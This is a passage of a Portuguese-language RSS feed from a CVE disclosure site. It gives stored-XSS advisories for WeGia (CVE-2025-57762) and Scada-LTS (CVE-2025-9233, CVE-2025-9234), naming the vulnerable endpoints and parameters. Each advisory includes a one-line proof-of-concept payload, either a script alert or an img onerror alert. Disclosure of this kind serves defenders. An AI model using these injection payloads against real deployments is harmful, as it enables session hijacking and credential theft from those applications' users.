&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;dependente_docdependente.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-57762-cross-site-scripting-xss-armazenado-no-endpoint-dependente_docdependentephp-parâmetro-name&amp;#34;&amp;gt;CVE-2025-57762: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;dependente_docdependente.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-57762&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-57762&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;dependente_docdependente.php&amp;lt;/code&amp;gt; do aplicativo WeGia. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;dependente_docdependente.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-57762/image.png&amp;#34;
	width=&amp;#34;1273&amp;#34;
	height=&amp;#34;849&amp;#34;
	srcset=&amp;#34;/p/cve-2025-57762/image_hu_79c930746da3382f.png 480w, /p/cve-2025-57762/image_hu_dca868afd0ec9e1d.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;149&amp;#34;
		data-flex-basis=&amp;#34;359px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-494r-43f3-p828&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-494r-43f3-p828&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;colaborador&amp;#34;&amp;gt;Colaborador
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 21 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9233</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9233/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9233/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9233-cross-site-scripting-xss-armazenado-no-endpoint-view_editshtm-parâmetro-name&amp;#34;&amp;gt;CVE-2025-9233: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;view_edit.shtm&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9233&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9233&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;view_edit.shtm&amp;lt;/code&amp;gt; do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;view_edit.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9233-cross-site-scripting-xss-armazenado-no-endpoint-view_editshtm-parâmetro-name&amp;#34;&amp;gt;CVE-2025-9233: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;view_edit.shtm&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9233&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9233&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;view_edit.shtm&amp;lt;/code&amp;gt; do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;view_edit.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#34;View1&amp;amp;#34;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9233/image.png&amp;#34;
	width=&amp;#34;917&amp;#34;
	height=&amp;#34;424&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9233/image_hu_5fdba5b40e1e1605.png 480w, /p/cve-2025-9233/image_hu_77b76c01a046725a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;216&amp;#34;
		data-flex-basis=&amp;#34;519px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-9233.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-9233.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 20 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9234</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9234/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9234/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9234-cross-site-scripting-xss-armazenado-no-endpoint-maintenance_eventsshtm-parâmetro-alias&amp;#34;&amp;gt;CVE-2025-9234: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;maintenance_events.shtm&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;alias&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9234&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9234&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;maintenance_events.shtm&amp;lt;/code&amp;gt; do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;alias&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;maintenance_events.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9234-cross-site-scripting-xss-armazenado-no-endpoint-maintenance_eventsshtm-parâmetro-alias&amp;#34;&amp;gt;CVE-2025-9234: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;maintenance_events.shtm&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;alias&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9234&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9234&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;maintenance_events.shtm&amp;lt;/code&amp;gt; do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;alias&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;maintenance_events.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;alias&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;alias&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#34;Maintenance&amp;amp;#34;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9234/image.png&amp;#34;
	width=&amp;#34;865&amp;#34;
	height=&amp;#34;422&amp;#34;
